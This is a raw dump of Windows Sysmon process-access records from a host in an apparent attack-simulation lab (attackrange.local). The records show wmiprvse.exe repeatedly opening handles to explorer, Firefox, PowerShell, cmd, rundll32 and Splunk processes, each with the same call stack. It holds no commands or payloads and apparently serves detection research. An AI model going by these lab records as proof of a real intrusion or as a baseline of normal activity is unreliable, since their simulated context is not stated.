16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 